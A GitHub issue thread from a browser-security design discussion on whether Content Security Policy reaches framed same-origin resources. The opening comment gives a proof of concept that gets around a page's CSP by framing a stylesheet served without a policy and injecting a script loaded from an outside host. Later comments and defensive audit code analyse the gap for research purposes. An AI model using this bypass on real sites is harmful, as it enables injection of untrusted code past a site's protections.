CSP not a strong enough mechanism for RIC implementation? #10

Open
weizman opened this issue Jul 28, 2024 · 5 comments
Comments

weizman commented Jul 28, 2024

I was sure CSP trickles down very strongly to child realms, but this resource seems to show otherwise (resource)?

```javascript
// visit example.com, open devtools and run this
// expected: script is blocked ; actual: script runs

// Replace the document with one carrying a CSP that only allows same-origin scripts.
document.write(`<head><meta http-equiv="Content-Security-Policy" content="script-src 'self' 'unsafe-inline'"></head><body>`);

setTimeout(() => {
    // Frame a same-origin, non-HTML resource (served without its own CSP).
    const frame = document.createElement("iframe");
    frame.src = "/css/bootstrap.min.css";
    document.body.appendChild(frame);

    setTimeout(() => {
        // Inject a remote script into the child realm; the top-level CSP does not apply there.
        const script = document.createElement('script');
        script.src = '//bo0om.ru/csp.js';
        window[0].document.head.appendChild(script);
    }, 500);
}, 500);
```

This requires further investigation

weizman commented Jul 28, 2024

Actually, maybe that makes sense, and maybe what I remembered was how same-origin realms that do not load remote resources (e.g. about:blank) are the ones obeying the top-level CSP? Still pretty bad...

mhofman commented Sep 3, 2024

Duplicate of #14? Frames or popups that load a network resource would have their own CSP evaluated. Also the src of these can be controlled by the frame-src directive.

weizman commented Sep 4, 2024

Not really though (on the practical level).

One of the biggest issues we had with Snow (that applies here as well) is how there's always an SO resource that doesn't follow the general CSP of the app, especially when it's not an HTML resource.

For example, x.com (which forbids unsafe-eval via CSP) will have a hard time adopting RIC because they have a massive amount of resources that are both served without CSP and are framable, for example:

[Screenshot 2024-09-04 at 16:08:48]

And that's true of most modern web apps.

AND - frame-src can't help you here either, unless you drop 'self', which would mostly break a bunch of other stuff.

I want RIC to solve this issue without requiring web apps to adjust their CSP servings (not because they shouldn't, but because it would take a lot of work thus they practically will never do so), so the question is how and whether it's possible given this behaviour?
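The behaviour discussed in the last two comments, as an added example that is not part of the RIC project: a small model of which CSP governs a child frame (local-scheme documents inherit the creator's policy, network-loaded ones use their own response headers), with a `frame-src` check and an audit that flags the gap described above, same-origin resources that are framable but served without any CSP. The sample headers and the `classifyFrame` / `auditSamples` helpers are constructed for this illustration.

```javascript
// Parse a CSP header value into a map of directive name -> source list.
function parseCsp(header) {
  const policy = {};
  for (const part of (header || '').split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Documents from local schemes (about:blank, srcdoc, blob:, data:) inherit the
// creator's policy; anything fetched over the network gets its own headers.
function inheritsCreatorCsp(src) {
  return ['about:blank', 'about:srcdoc'].includes(src) || /^(blob|data):/.test(src);
}

// Does the parent's frame-src (fallback: child-src, then default-src) allow this src?
function frameSrcAllows(parentCsp, src, parentOrigin) {
  const p = parseCsp(parentCsp);
  const sources = p['frame-src'] || p['child-src'] || p['default-src'];
  if (!sources) return true; // no applicable directive: unrestricted
  const origin = inheritsCreatorCsp(src) ? parentOrigin : new URL(src, parentOrigin).origin;
  return sources.some(s => s === '*' || s === origin ||
    (s === "'self'" && origin === parentOrigin));
}

// Classify one frame load. childHeaders: the child's response headers, lower-case keys.
function classifyFrame({ src, parentOrigin, parentCsp, childHeaders = {} }) {
  if (!frameSrcAllows(parentCsp, src, parentOrigin)) return 'blocked-by-frame-src';
  if (inheritsCreatorCsp(src)) return 'inherits-parent-csp';
  if (childHeaders['content-security-policy']) return 'own-csp';
  if (/^deny$/i.test(childHeaders['x-frame-options'] || '')) return 'not-framable';
  const sameOrigin = new URL(src, parentOrigin).origin === parentOrigin;
  return sameOrigin ? 'same-origin-no-csp' : 'cross-origin-no-csp'; // the gap in this issue
}

// Constructed sample mirroring the report above: a same-origin stylesheet framed
// under a script-src-only policy, an about:blank frame, and a frame-src lockdown.
const PARENT = { parentOrigin: 'https://example.com',
                 parentCsp: "script-src 'self' 'unsafe-inline'" };
function auditSamples() {
  return {
    stylesheet: classifyFrame({ ...PARENT, src: '/css/bootstrap.min.css',
                                childHeaders: { 'content-type': 'text/css' } }),
    blank: classifyFrame({ ...PARENT, src: 'about:blank' }),
    locked: classifyFrame({ ...PARENT, parentCsp: "frame-src 'none'",
                            src: '/css/bootstrap.min.css' }),
  };
}
```

Running `auditSamples()` shows the stylesheet case landing in `same-origin-no-csp`, while `frame-src 'self'` (the setting an app cannot realistically drop) still lets it through.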

weizman commented Sep 4, 2024

One approach could be to avoid riding the CSP mechanism for applying the RIC script, and instead ride the internal mechanism in browsers that constructs the WindowProxy object every time it reloads (iframe DOM reposition, iframe/popup src relocation, etc.)

Because that phase is very deterministic in telling when the WindowProxy should be reconstructed, and whether it represents an XO or a SO realm to top.

weizman commented Sep 12, 2024

This issue remains open for now given how it isn't addressed by #22, due to how it requires some further investigation.
